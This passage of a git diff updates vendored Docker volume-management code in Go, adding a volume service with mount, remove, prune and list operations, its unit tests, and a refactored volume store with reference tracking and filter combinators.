+ if err != nil { + return nil, err + } + vol := volumeToAPIType(v) + + var cfg opts.GetConfig + for _, o := range getOpts { + o(&cfg) + } + + if cfg.ResolveStatus { + vol.Status = v.Status() + } + return &vol, nil +} + +// Mount mounts the volume +func (s *VolumesService) Mount(ctx context.Context, vol *types.Volume, ref string) (string, error) { + v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver)) + if err != nil { + if IsNotExist(err) { + err = errdefs.NotFound(err) + } + return "", err + } + return v.Mount(ref) +} + +// Unmount unmounts the volume. +// Note that depending on the implementation, the volume may still be mounted due to other resources using it. +func (s *VolumesService) Unmount(ctx context.Context, vol *types.Volume, ref string) error { + v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver)) + if err != nil { + if IsNotExist(err) { + err = errdefs.NotFound(err) + } + return err + } + return v.Unmount(ref) +} + +// Release releases a volume reference +func (s *VolumesService) Release(ctx context.Context, name string, ref string) error { + return s.vs.Release(ctx, name, ref) +} + +// Remove removes a volume +func (s *VolumesService) Remove(ctx context.Context, name string, rmOpts ...opts.RemoveOption) error { + var cfg opts.RemoveConfig + for _, o := range rmOpts { + o(&cfg) + } + + v, err := s.vs.Get(ctx, name) + if err != nil { + if IsNotExist(err) && cfg.PurgeOnError { + return nil + } + return err + } + + err = s.vs.Remove(ctx, v, rmOpts...) 
+ if IsNotExist(err) { + err = nil + } else if IsInUse(err) { + err = errdefs.Conflict(err) + } else if IsNotExist(err) && cfg.PurgeOnError { + err = nil + } + + if err == nil { + s.eventLogger.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + } + return err +} + +var acceptedPruneFilters = map[string]bool{ + "label": true, + "label!": true, +} + +var acceptedListFilters = map[string]bool{ + "dangling": true, + "name": true, + "driver": true, + "label": true, +} + +// LocalVolumesSize gets all local volumes and fetches their size on disk +// Note that this intentionally skips volumes which have mount options. Typically +// volumes with mount options are not really local even if they are using the +// local driver. +func (s *VolumesService) LocalVolumesSize(ctx context.Context) ([]*types.Volume, error) { + ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + return ok && len(dv.Options()) == 0 + }))) + if err != nil { + return nil, err + } + return s.volumesToAPI(ctx, ls, calcSize(true)), nil +} + +// Prune removes (local) volumes which match the past in filter arguments. +// Note that this intentionally skips volumes with mount options as there would +// be no space reclaimed in this case. 
+func (s *VolumesService) Prune(ctx context.Context, filter filters.Args) (*types.VolumesPruneReport, error) { + if !atomic.CompareAndSwapInt32(&s.pruneRunning, 0, 1) { + return nil, errdefs.Conflict(errors.New("a prune operation is already running")) + } + defer atomic.StoreInt32(&s.pruneRunning, 0) + + by, err := filtersToBy(filter, acceptedPruneFilters) + if err != nil { + return nil, err + } + ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), ByReferenced(false), by, CustomFilter(func(v volume.Volume) bool { + dv, ok := v.(volume.DetailedVolume) + return ok && len(dv.Options()) == 0 + }))) + if err != nil { + return nil, err + } + + rep := &types.VolumesPruneReport{VolumesDeleted: make([]string, 0, len(ls))} + for _, v := range ls { + select { + case <-ctx.Done(): + err := ctx.Err() + if err == context.Canceled { + err = nil + } + return rep, err + default: + } + + vSize, err := directory.Size(ctx, v.Path()) + if err != nil { + logrus.WithField("volume", v.Name()).WithError(err).Warn("could not determine size of volume") + } + if err := s.vs.Remove(ctx, v); err != nil { + logrus.WithError(err).WithField("volume", v.Name()).Warnf("Could not determine size of volume") + continue + } + rep.SpaceReclaimed += uint64(vSize) + rep.VolumesDeleted = append(rep.VolumesDeleted, v.Name()) + } + return rep, nil +} + +// List gets the list of volumes which match the past in filters +// If filters is nil or empty all volumes are returned. 
+func (s *VolumesService) List(ctx context.Context, filter filters.Args) (volumesOut []*types.Volume, warnings []string, err error) { + by, err := filtersToBy(filter, acceptedListFilters) + if err != nil { + return nil, nil, err + } + + volumes, warnings, err := s.vs.Find(ctx, by) + if err != nil { + return nil, nil, err + } + + return s.volumesToAPI(ctx, volumes, useCachedPath(true)), warnings, nil +} + +// Shutdown shuts down the image service and dependencies +func (s *VolumesService) Shutdown() error { + return s.vs.Shutdown() +} diff --git a/vendor/github.com/docker/docker/volume/service/service_linux_test.go b/vendor/github.com/docker/docker/volume/service/service_linux_test.go new file mode 100644 index 0000000000..ae70d7e2c5 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service_linux_test.go @@ -0,0 +1,66 @@ +package service + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/service/opts" + "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestLocalVolumeSize(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(dir) + + l, err := local.New(dir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()}) + assert.Assert(t, err) + assert.Assert(t, ds.Register(l, volume.DefaultDriverName)) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("fake"), "fake")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + + ctx := context.Background() + v1, err := service.Create(ctx, "test1", volume.DefaultDriverName, opts.WithCreateReference("foo")) + assert.Assert(t, err) + v2, err := service.Create(ctx, "test2", volume.DefaultDriverName) + 
assert.Assert(t, err) + _, err = service.Create(ctx, "test3", "fake") + assert.Assert(t, err) + + data := make([]byte, 1024) + err = ioutil.WriteFile(filepath.Join(v1.Mountpoint, "data"), data, 0644) + assert.Assert(t, err) + err = ioutil.WriteFile(filepath.Join(v2.Mountpoint, "data"), data[:1], 0644) + assert.Assert(t, err) + + ls, err := service.LocalVolumesSize(ctx) + assert.Assert(t, err) + assert.Assert(t, is.Len(ls, 2)) + + for _, v := range ls { + switch v.Name { + case "test1": + assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data)))) + assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(1))) + case "test2": + assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data[:1])))) + assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(0))) + default: + t.Fatalf("got unexpected volume: %+v", v) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/service/service_test.go b/vendor/github.com/docker/docker/volume/service/service_test.go new file mode 100644 index 0000000000..870d19f8a0 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/service_test.go @@ -0,0 +1,253 @@ +package service + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + "github.com/docker/docker/volume/testutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestServiceCreate(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + + ctx := context.Background() + service, cleanup := newTestService(t, ds) + defer cleanup() + + _, err := service.Create(ctx, "v1", "notexist") + assert.Assert(t, errdefs.IsNotFound(err), err) + + v, err := service.Create(ctx, "v1", 
"d1") + assert.Assert(t, err) + + vCopy, err := service.Create(ctx, "v1", "d1") + assert.Assert(t, err) + assert.Assert(t, is.DeepEqual(v, vCopy)) + + _, err = service.Create(ctx, "v1", "d2") + assert.Check(t, IsNameConflict(err), err) + assert.Check(t, errdefs.IsConflict(err), err) + + assert.Assert(t, service.Remove(ctx, "v1")) + _, err = service.Create(ctx, "v1", "d2") + assert.Assert(t, err) + _, err = service.Create(ctx, "v1", "d2") + assert.Assert(t, err) + +} + +func TestServiceList(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + + ctx := context.Background() + + _, err := service.Create(ctx, "v1", "d1") + assert.Assert(t, err) + _, err = service.Create(ctx, "v2", "d1") + assert.Assert(t, err) + _, err = service.Create(ctx, "v3", "d2") + assert.Assert(t, err) + + ls, _, err := service.List(ctx, filters.NewArgs(filters.Arg("driver", "d1"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 2)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "notexist"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 3)) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + + _, err = service.Get(ctx, "v1", opts.WithGetReference("foo")) + assert.Assert(t, err) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 2)) + ls, _, err = service.List(ctx, 
filters.NewArgs(filters.Arg("dangling", "false"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) + + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"), filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 0)) + ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"), filters.Arg("driver", "d2"))) + assert.Assert(t, err) + assert.Check(t, is.Len(ls, 1)) +} + +func TestServiceRemove(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + _, err := service.Create(ctx, "test", "d1") + assert.Assert(t, err) + + assert.Assert(t, service.Remove(ctx, "test")) + assert.Assert(t, service.Remove(ctx, "test", opts.WithPurgeOnError(true))) +} + +func TestServiceGet(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + v, err := service.Get(ctx, "notexist") + assert.Assert(t, IsNotExist(err)) + assert.Check(t, v == nil) + + created, err := service.Create(ctx, "test", "d1") + assert.Assert(t, err) + assert.Assert(t, created != nil) + + v, err = service.Get(ctx, "test") + assert.Assert(t, err) + assert.Assert(t, is.DeepEqual(created, v)) + + v, err = service.Get(ctx, "test", opts.WithGetResolveStatus) + assert.Assert(t, err) + assert.Assert(t, is.Len(v.Status, 1), v.Status) + + v, err = service.Get(ctx, "test", opts.WithGetDriver("notarealdriver")) + assert.Assert(t, errdefs.IsConflict(err), err) + v, err = service.Get(ctx, "test", opts.WithGetDriver("d1")) + assert.Assert(t, err == nil) + assert.Assert(t, is.DeepEqual(created, v)) + + assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2")) + v, err = service.Get(ctx, 
"test", opts.WithGetDriver("d2")) + assert.Assert(t, errdefs.IsConflict(err), err) +} + +func TestServicePrune(t *testing.T) { + t.Parallel() + + ds := volumedrivers.NewStore(nil) + assert.Assert(t, ds.Register(testutils.NewFakeDriver(volume.DefaultDriverName), volume.DefaultDriverName)) + assert.Assert(t, ds.Register(testutils.NewFakeDriver("other"), "other")) + + service, cleanup := newTestService(t, ds) + defer cleanup() + ctx := context.Background() + + _, err := service.Create(ctx, "test", volume.DefaultDriverName) + assert.Assert(t, err) + _, err = service.Create(ctx, "test2", "other") + assert.Assert(t, err) + + pr, err := service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + + _, err = service.Get(ctx, "test") + assert.Assert(t, IsNotExist(err), err) + + v, err := service.Get(ctx, "test2") + assert.Assert(t, err) + assert.Assert(t, is.Equal(v.Driver, "other")) + + _, err = service.Create(ctx, "test", volume.DefaultDriverName) + assert.Assert(t, err) + + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + v, err = service.Get(ctx, "test2") + assert.Assert(t, err) + assert.Assert(t, is.Equal(v.Driver, "other")) + + _, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": ""})) + assert.Assert(t, err) + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + + _, err = service.Create(ctx, "test3", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": "split"})) 
+ assert.Assert(t, err) + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana=split"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) + + pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana=split"))) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test3")) + + v, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateReference(t.Name())) + assert.Assert(t, err) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 0)) + assert.Assert(t, service.Release(ctx, v.Name, t.Name())) + + pr, err = service.Prune(ctx, filters.NewArgs()) + assert.Assert(t, err) + assert.Assert(t, is.Len(pr.VolumesDeleted, 1)) + assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test")) +} + +func newTestService(t *testing.T, ds *volumedrivers.Store) (*VolumesService, func()) { + t.Helper() + + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + + store, err := NewStore(dir, ds) + assert.Assert(t, err) + s := &VolumesService{vs: store, eventLogger: dummyEventLogger{}} + return s, func() { + assert.Check(t, s.Shutdown()) + assert.Check(t, os.RemoveAll(dir)) + } +} + +type dummyEventLogger struct{} + +func (dummyEventLogger) LogVolumeEvent(_, _ string, _ map[string]string) {} diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/service/store.go similarity index 51% rename from vendor/github.com/docker/docker/volume/store/store.go rename to vendor/github.com/docker/docker/volume/service/store.go index 38afd86f45..e7e9d8a320 100644 --- a/vendor/github.com/docker/docker/volume/store/store.go +++ b/vendor/github.com/docker/docker/volume/service/store.go @@ -1,19 +1,25 @@ -package store +package service // import 
"github.com/docker/docker/volume/service" import ( + "context" + "fmt" "net" "os" "path/filepath" + "runtime" "sync" "time" "github.com/pkg/errors" - "github.com/Sirupsen/logrus" "github.com/boltdb/bolt" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/locker" "github.com/docker/docker/volume" "github.com/docker/docker/volume/drivers" + volumemounts "github.com/docker/docker/volume/mounts" + "github.com/docker/docker/volume/service/opts" + "github.com/sirupsen/logrus" ) const ( @@ -28,7 +34,10 @@ type volumeWrapper struct { } func (v volumeWrapper) Options() map[string]string { - options := map[string]string{} + if v.options == nil { + return nil + } + options := make(map[string]string, len(v.options)) for key, value := range v.options { options[key] = value } @@ -36,7 +45,15 @@ func (v volumeWrapper) Options() map[string]string { } func (v volumeWrapper) Labels() map[string]string { - return v.labels + if v.labels == nil { + return nil + } + + labels := make(map[string]string, len(v.labels)) + for key, value := range v.labels { + labels[key] = value + } + return labels } func (v volumeWrapper) Scope() string { @@ -52,28 +69,26 @@ func (v volumeWrapper) CachedPath() string { return v.Volume.Path() } -// New initializes a VolumeStore to keep -// reference counting of volumes in the system. 
-func New(rootPath string) (*VolumeStore, error) { +// NewStore creates a new volume store at the given path +func NewStore(rootPath string, drivers *drivers.Store) (*VolumeStore, error) { vs := &VolumeStore{ locks: &locker.Locker{}, names: make(map[string]volume.Volume), - refs: make(map[string][]string), + refs: make(map[string]map[string]struct{}), labels: make(map[string]map[string]string), options: make(map[string]map[string]string), + drivers: drivers, } if rootPath != "" { // initialize metadata store volPath := filepath.Join(rootPath, volumeDataDir) - if err := os.MkdirAll(volPath, 750); err != nil { + if err := os.MkdirAll(volPath, 0750); err != nil { return nil, err } - dbPath := filepath.Join(volPath, "metadata.db") - var err error - vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second}) + vs.db, err = bolt.Open(filepath.Join(volPath, "metadata.db"), 0600, &bolt.Options{Timeout: 1 * time.Second}) if err != nil { return nil, errors.Wrap(err, "error while opening volume store metadata database") } @@ -102,31 +117,59 @@ func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) { } func (s *VolumeStore) setNamed(v volume.Volume, ref string) { + name := v.Name() + s.globalLock.Lock() - s.names[v.Name()] = v + s.names[name] = v if len(ref) > 0 { - s.refs[v.Name()] = append(s.refs[v.Name()], ref) + if s.refs[name] == nil { + s.refs[name] = make(map[string]struct{}) + } + s.refs[name][ref] = struct{}{} } s.globalLock.Unlock() } +// hasRef returns true if the given name has at least one ref. +// Callers of this function are expected to hold the name lock. +func (s *VolumeStore) hasRef(name string) bool { + s.globalLock.RLock() + l := len(s.refs[name]) + s.globalLock.RUnlock() + return l > 0 +} + // getRefs gets the list of refs for a given name // Callers of this function are expected to hold the name lock. 
func (s *VolumeStore) getRefs(name string) []string { s.globalLock.RLock() - refs := s.refs[name] - s.globalLock.RUnlock() + defer s.globalLock.RUnlock() + + refs := make([]string, 0, len(s.refs[name])) + for r := range s.refs[name] { + refs = append(refs, r) + } + return refs } -// Purge allows the cleanup of internal data on docker in case +// purge allows the cleanup of internal data on docker in case // the internal data is out of sync with volumes driver plugins. -func (s *VolumeStore) Purge(name string) { +func (s *VolumeStore) purge(ctx context.Context, name string) error { s.globalLock.Lock() + defer s.globalLock.Unlock() + + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + v, exists := s.names[name] if exists { - if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil { - logrus.Error("Error dereferencing volume driver: %v", err) + driverName := v.DriverName() + if _, err := s.drivers.ReleaseDriver(driverName); err != nil { + logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver") } } if err := s.removeMeta(name); err != nil { @@ -136,21 +179,22 @@ func (s *VolumeStore) Purge(name string) { delete(s.refs, name) delete(s.labels, name) delete(s.options, name) - s.globalLock.Unlock() + return nil } // VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts type VolumeStore struct { // locks ensures that only one action is being performed on a particular volume at a time without locking the entire store // since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes. - locks *locker.Locker + locks *locker.Locker + drivers *drivers.Store // globalLock is used to protect access to mutable structures used by the store object globalLock sync.RWMutex // names stores the volume name -> volume relationship. 
// This is used for making lookups faster so we don't have to probe all drivers names map[string]volume.Volume // refs stores the volume name and the list of things referencing it - refs map[string][]string + refs map[string]map[string]struct{} // labels stores volume labels for each volume labels map[string]map[string]string // options stores volume options for each volume @@ -158,18 +202,141 @@ type VolumeStore struct { db *bolt.DB } -// List proxies to all registered volume drivers to get the full list of volumes +func filterByDriver(names []string) filterFunc { + return func(v volume.Volume) bool { + for _, name := range names { + if name == v.DriverName() { + return true + } + } + return false + } +} + +func (s *VolumeStore) byReferenced(referenced bool) filterFunc { + return func(v volume.Volume) bool { + return s.hasRef(v.Name()) == referenced + } +} + +func (s *VolumeStore) filter(ctx context.Context, vols *[]volume.Volume, by By) (warnings []string, err error) { + // note that this specifically does not support the `FromList` By type. + switch f := by.(type) { + case nil: + if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return warnings, err + } + *vols = ls + } + case byDriver: + if *vols != nil { + filter(vols, filterByDriver([]string(f))) + return nil, nil + } + var ls []volume.Volume + ls, warnings, err = s.list(ctx, []string(f)...) + if err != nil { + return nil, err + } + *vols = ls + case ByReferenced: + // TODO(@cpuguy83): It would be nice to optimize this by looking at the list + // of referenced volumes, however the locking strategy makes this difficult + // without either providing inconsistent data or deadlocks. 
+ if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return nil, err + } + *vols = ls + } + filter(vols, s.byReferenced(bool(f))) + case andCombinator: + for _, by := range f { + w, err := s.filter(ctx, vols, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + } + case orCombinator: + for _, by := range f { + switch by.(type) { + case byDriver: + var ls []volume.Volume + w, err := s.filter(ctx, &ls, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + default: + ls, w, err := s.list(ctx) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + w, err = s.filter(ctx, &ls, by) + if err != nil { + return warnings, err + } + warnings = append(warnings, w...) + *vols = append(*vols, ls...) + } + } + unique(vols) + case CustomFilter: + if *vols == nil { + var ls []volume.Volume + ls, warnings, err = s.list(ctx) + if err != nil { + return nil, err + } + *vols = ls + } + filter(vols, filterFunc(f)) + default: + return nil, errdefs.InvalidParameter(errors.Errorf("unsupported filter: %T", f)) + } + return warnings, nil +} + +func unique(ls *[]volume.Volume) { + names := make(map[string]bool, len(*ls)) + filter(ls, func(v volume.Volume) bool { + if names[v.Name()] { + return false + } + names[v.Name()] = true + return true + }) +} + +// Find lists volumes filtered by the past in filter. // If a driver returns a volume that has name which conflicts with another volume from a different driver, // the first volume is chosen and the conflicting volume is dropped. 
-func (s *VolumeStore) List() ([]volume.Volume, []string, error) { - vols, warnings, err := s.list() +func (s *VolumeStore) Find(ctx context.Context, by By) (vols []volume.Volume, warnings []string, err error) { + logrus.WithField("ByType", fmt.Sprintf("%T", by)).WithField("ByValue", fmt.Sprintf("%+v", by)).Debug("VolumeStore.Find") + switch f := by.(type) { + case nil, orCombinator, andCombinator, byDriver, ByReferenced, CustomFilter: + warnings, err = s.filter(ctx, &vols, by) + case fromList: + warnings, err = s.filter(ctx, f.ls, f.by) + default: + // Really shouldn't be possible, but makes sure that any new By's are added to this check. + err = errdefs.InvalidParameter(errors.Errorf("unsupported filter type: %T", f)) + } if err != nil { return nil, nil, &OpErr{Err: err, Op: "list"} } + var out []volume.Volume for _, v := range vols { - name := normaliseVolumeName(v.Name()) + name := normalizeVolumeName(v.Name()) s.locks.Lock(name) storedV, exists := s.getNamed(name) @@ -187,26 +354,59 @@ func (s *VolumeStore) List() ([]volume.Volume, []string, error) { return out, warnings, nil } +type filterFunc func(volume.Volume) bool + +func filter(vols *[]volume.Volume, fn filterFunc) { + var evict []int + for i, v := range *vols { + if !fn(v) { + evict = append(evict, i) + } + } + + for n, i := range evict { + copy((*vols)[i-n:], (*vols)[i-n+1:]) + (*vols)[len(*vols)-1] = nil + *vols = (*vols)[:len(*vols)-1] + } +} + // list goes through each volume driver and asks for its list of volumes. 
-func (s *VolumeStore) list() ([]volume.Volume, []string, error) { +// TODO(@cpuguy83): plumb context through +func (s *VolumeStore) list(ctx context.Context, driverNames ...string) ([]volume.Volume, []string, error) { var ( - ls []volume.Volume + ls = []volume.Volume{} // do not return a nil value as this affects filtering warnings []string ) - drivers, err := volumedrivers.GetAllDrivers() + var dls []volume.Driver + + all, err := s.drivers.GetAllDrivers() if err != nil { return nil, nil, err } + if len(driverNames) == 0 { + dls = all + } else { + idx := make(map[string]bool, len(driverNames)) + for _, name := range driverNames { + idx[name] = true + } + for _, d := range all { + if idx[d.Name()] { + dls = append(dls, d) + } + } + } type vols struct { vols []volume.Volume err error driverName string } - chVols := make(chan vols, len(drivers)) + chVols := make(chan vols, len(dls)) - for _, vd := range drivers { + for _, vd := range dls { go func(d volume.Driver) { vs, err := d.List() if err != nil { @@ -224,13 +424,12 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) { } badDrivers := make(map[string]struct{}) - for i := 0; i < len(drivers); i++ { + for i := 0; i < len(dls); i++ { vs := <-chVols if vs.err != nil { warnings = append(warnings, vs.err.Error()) badDrivers[vs.driverName] = struct{}{} - logrus.Warn(vs.err) } ls = append(ls, vs.vols...) } @@ -247,28 +446,37 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) { return ls, warnings, nil } -// CreateWithRef creates a volume with the given name and driver and stores the ref -// This ensures there's no race between creating a volume and then storing a reference. 
-func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) { - name = normaliseVolumeName(name) +// Create creates a volume with the given name and driver +// If the volume needs to be created with a reference to prevent race conditions +// with volume cleanup, make sure to use the `CreateWithReference` option. +func (s *VolumeStore) Create(ctx context.Context, name, driverName string, createOpts ...opts.CreateOption) (volume.Volume, error) { + var cfg opts.CreateConfig + for _, o := range createOpts { + o(&cfg) + } + + name = normalizeVolumeName(name) s.locks.Lock(name) defer s.locks.Unlock(name) - v, err := s.create(name, driverName, opts, labels) + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } + + v, err := s.create(ctx, name, driverName, cfg.Options, cfg.Labels) if err != nil { + if _, ok := err.(*OpErr); ok { + return nil, err + } return nil, &OpErr{Err: err, Name: name, Op: "create"} } - s.setNamed(v, ref) + s.setNamed(v, cfg.Reference) return v, nil } -// Create creates a volume with the given name and driver. -// This is just like CreateWithRef() except we don't store a reference while holding the lock. -func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { - return s.CreateWithRef(name, driverName, "", opts, labels) -} - // checkConflict checks the local cache for name collisions with the passed in name, // for existing volumes with the same name but in a different driver. // This is used by `Create` as a best effort to prevent name collisions for volumes. @@ -282,7 +490,7 @@ func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]st // TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially // use a connect timeout for this kind of check to ensure we aren't blocking for a // long time. 
-func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) { +func (s *VolumeStore) checkConflict(ctx context.Context, name, driverName string) (volume.Volume, error) { // check the local cache v, _ := s.getNamed(name) if v == nil { @@ -294,7 +502,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err if driverName != "" { // Retrieve canonical driver name to avoid inconsistencies (for example // "plugin" vs. "plugin:latest") - vd, err := volumedrivers.GetDriver(driverName) + vd, err := s.drivers.GetDriver(driverName) if err != nil { return nil, err } @@ -306,7 +514,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err // let's check if the found volume ref // is stale by checking with the driver if it still exists - exists, err := volumeExists(v) + exists, err := volumeExists(ctx, s.drivers, v) if err != nil { return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err) } @@ -318,21 +526,21 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err return v, nil } - if len(s.getRefs(v.Name())) > 0 { + if s.hasRef(v.Name()) { // Containers are referencing this volume but it doesn't seem to exist anywhere. // Return a conflict error here, the user can fix this with `docker volume rm -f` return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName) } // doesn't exist, so purge it from the cache - s.Purge(name) + s.purge(ctx, name) return nil, nil } // volumeExists returns if the volume is still present in the driver. // An error is returned if there was an issue communicating with the driver. 
-func volumeExists(v volume.Volume) (bool, error) { - exists, err := lookupVolume(v.DriverName(), v.Name()) +func volumeExists(ctx context.Context, store *drivers.Store, v volume.Volume) (bool, error) { + exists, err := lookupVolume(ctx, store, v.DriverName(), v.Name()) if err != nil { return false, err } @@ -345,51 +553,61 @@ func volumeExists(v volume.Volume) (bool, error) { // for the given volume name, an error is returned after checking if the reference is stale. // If the reference is stale, it will be purged and this create can continue. // It is expected that callers of this function hold any necessary locks. -func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) { +func (s *VolumeStore) create(ctx context.Context, name, driverName string, opts, labels map[string]string) (volume.Volume, error) { // Validate the name in a platform-specific manner - valid, err := volume.IsVolumeNameValid(name) + + // volume name validation is specific to the host os and not on container image + // windows/lcow should have an equivalent volumename validation logic so we create a parser for current host OS + parser := volumemounts.NewParser(runtime.GOOS) + err := parser.ValidateVolumeName(name) if err != nil { return nil, err } - if !valid { - return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"} - } - v, err := s.checkConflict(name, driverName) + v, err := s.checkConflict(ctx, name, driverName) if err != nil { return nil, err } if v != nil { - return v, nil + // there is an existing volume, if we already have this stored locally, return it. 
